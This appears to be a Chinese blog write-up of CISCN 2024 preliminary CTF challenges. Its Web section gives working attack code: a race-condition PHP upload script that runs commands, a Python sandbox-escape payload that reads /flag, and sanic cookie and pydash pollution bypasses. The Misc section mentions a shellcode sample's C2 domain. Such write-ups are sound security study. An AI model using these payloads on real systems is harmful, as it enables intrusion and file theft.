CISCN 初赛 2024
本文最后更新于 203 天前,其中的信息可能已经有所发展或是发生改变。

重温经典,在短短两天之内让人感觉到全国CTF水平大幅度提升,题都是几百支队伍随便杀,为国内CTF整体水平的迅猛提升感到高兴

Web

Simple_php

  • 条件竞争打临时文件,php反弹shell
import requests
import threading
import re

url = "url"

proxies = {"http": None}

def upoadFile():
    file = {"files": open("e.php")}
    data = {"cmd": "du -a /"}
    res = requests.post(url, files=file, data=data)
    r = re.findall("(/tmp/php.*)", res.text)
    # print(r)
    if r and r[0] != '' and r[0] != '/tmp/php':
        print("php " + r[0])
        exec("php " + r[0])
    # print(res.text)
    
def getPhp():
    
    data = {"cmd": "du -lh --max-depth=1 -a /tmp"}
    res = requests.post(url, data=data)
    r = re.findall("(/tmp/php.*)", res.text)
    # print(r)
    if r and r[0] != '' and r[0] != '/tmp/php':
        print("php " + r[0])
        exec("php " + r[0])
    
def exec(cmd):
    data = {"cmd": cmd}
    res = requests.post(url, data=data)
    print(res.text)

if __name__ == "__main__":
    for i in range(5):
        threading.Thread(target=getPhp).start()
        threading.Thread(target=upoadFile).start()

mossfern

  • 改改L3HCTF的payload即可
builtins = [a:=[],d:=a.append,d([b.gi_frame.f_back.f_back.f_globals]for b in a),*a[0]][-1][0]["_""_builtins_""_"]
eval = builtins.eval
flag = eval("_""_import_""_('os').popen('cat /flag').read()", {"_""_builtins_""_": builtins})
print(flag[::-1])

sanic

  • src
from sanic import Sanic
from sanic.response import text, html
from sanic_session import Session
import pydash
# pydash==5.1.2


class Pollute:
    def __init__(self):
        pass


app = Sanic(__name__)
app.static("/static/", "./static/")
Session(app)


@app.route('/', methods=['GET', 'POST'])
async def index(request):
    return html(open('static/index.html').read())


@app.route("/login")
async def login(request):
    user = request.cookies.get("user")
    if user.lower() == 'adm;n':
        request.ctx.session['admin'] = True
        return text("login success")

    return text("login fail")


@app.route("/src")
async def src(request):
    return text(open(__file__).read())


@app.route("/admin", methods=['GET', 'POST'])
async def admin(request):
    if request.ctx.session.get('admin') == True:
        key = request.json['key']
        value = request.json['value']
        if key and value and type(key) is str and '_.' not in key:
            pollute = Pollute()
            pydash.set_(pollute, key, value)
            return text("success")
        else:
            return text("forbidden")

    return text("forbidden")


if __name__ == '__main__':
    app.run(host='0.0.0.0')
  • 审计sanic源码,通过八进制绕过cookie
COOKIE_NAME_RESERVED_CHARS = re.compile(
    '[\x00-\x1F\x7F-\xFF()<>@,;:\\\\"/[\\]?={} \x09]'
)
OCTAL_PATTERN = re.compile(r"\\[0-3][0-7][0-7]")
QUOTE_PATTERN = re.compile(r"[\\].")
Cookie: user="adm\073n"
  • 审计pydash,绕过过滤__.
def to_path_tokens(value):
    """Parse `value` into :class:`PathToken` objects."""
    if pyd.is_string(value) and ("." in value or "[" in value):
        # Since we can't tell whether a bare number is supposed to be dict key or a list index, we
        # support a special syntax where any string-integer surrounded by brackets is treated as a
        # list index and converted to an integer.
        keys = [
            PathToken(int(key[1:-1]), default_factory=list)
            if RE_PATH_LIST_INDEX.match(key)
            else PathToken(unescape_path_key(key), default_factory=dict)
            for key in filter(None, RE_PATH_KEY_DELIM.split(value))
        ]
    elif pyd.is_string(value) or pyd.is_number(value):
        keys = [PathToken(value, default_factory=dict)]
    elif value is UNSET:
        keys = []
    else:
        keys = value

    return keys


def unescape_path_key(key):
    """Unescape path key."""
    key = key.replace(r"\\", "\\")
    key = key.replace(r"\.", r".")
    return key
{"key":"__init__\\\\.__globals__\\\\.xxxx","value":"xxxx"}
  • 此时污染__file__可任意文件读,但题目似乎最终需要RCE,最终需要列出目录,污染staticDirectoryHandlerdirectory_view_partsTrue/,从cnss的✌那学来的,具体poc就不写了

Misc

通风机

  • 软件题

盗版软件

  • hackexe.exe运行后生成output.png,LSB隐写,R全通道,隔一个像素取一个
  • 解压得到shellcode,微步分析一下得到c2地址
  • 进程转储中存在多个winhack.com,拼接求MD5

神秘文件

  • P1
  • P2,分离出一个docx,caesar k=10
  • P3,olevba分离宏,RC4
Sub crypto(sMessage, strKey)
    Dim kLen, x, y, i, j, temp
    Dim s(256), k(256)

    kLen = Len(strKey)
    For i = 0 To 255
        s(i) = i
        k(i) = Asc(Mid(strKey, (i Mod kLen) + 1, 1))
    Next

    j = 0
    For i = 0 To 255
        j = (j + k(i) + s(i)) Mod 256
        temp = s(i)
        s(i) = s(j)
        s(j) = temp
    Next

    x = 0
    y = 0

    For i = 1 To 3072
        x = (x + 1) Mod 256
        y = (y + s(x)) Mod 256
        temp = s(x)
        s(x) = s(y)
        s(y) = temp
    Next

    For i = 1 To Len(sMessage)
        x = (x + 1) Mod 256
        y = (y + s(x)) Mod 256
        temp = s(x)
        s(x) = s(y)
        s(y) = temp

        crypto = crypto & (s((s(x) + s(y)) Mod 256) Xor Asc(Mid(sMessage, i, 1))) & ","
    Next
    'i13POMdzEAzHfy4dGS+vUA==(After base64)
End Sub
  • P4,base64
  • P5,base64
  • P6,base64
  • P7,rot13
  • P8,教你做事
  • P9
  • P10,Vigenere

评论

  1. Avatar photo
    Guest
    7 月前
    2024-5-28 16:02:39

    WMIESCB 大佬ヾ(≧∇≦*)ゝ

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇